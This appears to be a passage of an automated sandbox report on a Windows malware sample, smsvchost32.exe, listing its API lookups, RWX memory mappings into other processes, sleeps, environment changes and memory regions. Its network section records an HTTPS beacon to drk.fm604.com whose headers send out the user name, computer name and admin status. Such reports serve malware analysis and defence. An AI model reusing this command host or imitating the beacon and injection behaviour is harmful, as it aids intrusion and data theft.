| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x753cdb90 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
2 | |
| Get Address | c:\windows\syswow64\rpcrt4.dll | function = UuidCreateSequential, address_out = 0x7507db30 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x765b9f10 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessTimes, address_out = 0x765c3dc0 |
|
178 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
178 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomA, address_out = 0x765bef10 |
|
178 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AddAtomA, address_out = 0x765bff60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomA, address_out = 0x765b1bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtCreateSection, address_out = 0x779d7140 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtMapViewOfSection, address_out = 0x779d6f20 |
|
4 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
6 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64EnableWow64FsRedirection, address_out = 0x765db4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SystemFunction036, address_out = 0x74682a60 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 47251084 |
|
2 | |
| Map | - | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2bb0000 |
|
2 | |
| Map | - | process_name = c:\program files (x86)\msecache\safari.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x410000 |
|
1 | |
| Map | - | process_name = c:\program files (x86)\msecache\safari.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x520000 |
|
1 |
System (239)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = X2VS1CUM |
|
4 | |
| Sleep | duration = 50000 milliseconds (50.000 seconds) |
|
1 | |
| Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 | |
| Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
4 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Sleep | duration = 30 milliseconds (0.030 seconds) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
15 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
2 | |
| Sleep | duration = 98189 milliseconds (98.189 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 152500 |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:49 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
95 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
96 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 | |
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = ServiceEntryPointThread |
|
1 | |
| Open | mutex_name = ServiceEntryPointThread, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Environment (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = crackmeololo |
|
3 | |
| Set Environment String | name = USERNAME, value = Nd9E1FYi |
|
1 | |
| Set Environment String | name = standalonemtm, value = true |
|
1 | |
| Set Environment String | name = vendor_id, value = exe_scheduler_2816 |
|
1 | |
| Set Environment String | name = mainprocessoverride, value = svchost.exe |
|
1 | |
| Set Environment String | name = RandomListenPortBase, value = 6000 |
|
1 |
Debug (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = MP3 file corrupted |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = OGG 0 |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 259 bytes |
| Total Data Received | 124.51 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | drk.fm604.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | drk.fm604.com |
| Server Port | 443 |
| Data Sent | 259 |
| Data Received | 127496 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/2091998236, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rpersist4/2091998236 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 512 |
|
249 | |
| Close Session | - |
|
1 |
Process #7: smsvchost32.exe
1009
290
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:10, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb8 |
| Parent PID | 0xdb0 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E74
0x
D5C
0x
560
0x
4D4
0x
E2C
0x
C48
0x
55C
0x
E8C
0x
9A4
0x
E50
0x
EC8
0x
E44
0x
D60
0x
E60
0x
F70
0x
3F8
0x
A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043cfff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004b2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005c0000 | 0x0067dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x00b30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x01f3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaut32.dll | 0x01f40000 | 0x01fd0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02040000 | 0x02376fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| counters.dat | 0x02480000 | 0x02480fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x02493fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0271ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002860000 | 0x02860000 | 0x02860fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c40000 | 0x02c40000 | 0x02c41fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002c50000 | 0x02c50000 | 0x02c50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x0305afff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x0309ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030a0000 | 0x030a0000 | 0x0319ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031a0000 | 0x031a0000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x033a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x033dffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x033e0000 | 0x033e4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x033f0000 | 0x033fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x0343ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003440000 | 0x03440000 | 0x0353ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x0373ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003740000 | 0x03740000 | 0x03b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b10000 | 0x03b10000 | 0x0409efff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x0449ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04618fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04799fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04a35fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004620000 | 0x04620000 | 0x0481bfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x04b12fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x04a98fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04fd4fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x6fe50000 | 0x6fe70fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fe80000 | 0x6fee7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptnet.dll | 0x6fef0000 | 0x6ff14fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x6ff20000 | 0x6ff3efff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff40000 | 0x6ff52fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x6fff0000 | 0x6fff7fff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x70000000 | 0x7000efff | Memory Mapped File | rwx |
|
|
|
- |
| cmpbk32.dll | 0x70010000 | 0x70019fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x70040000 | 0x7006efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x70070000 | 0x70082fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x700a0000 | 0x700b9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x70e20000 | 0x70e33fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x70e40000 | 0x70e52fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
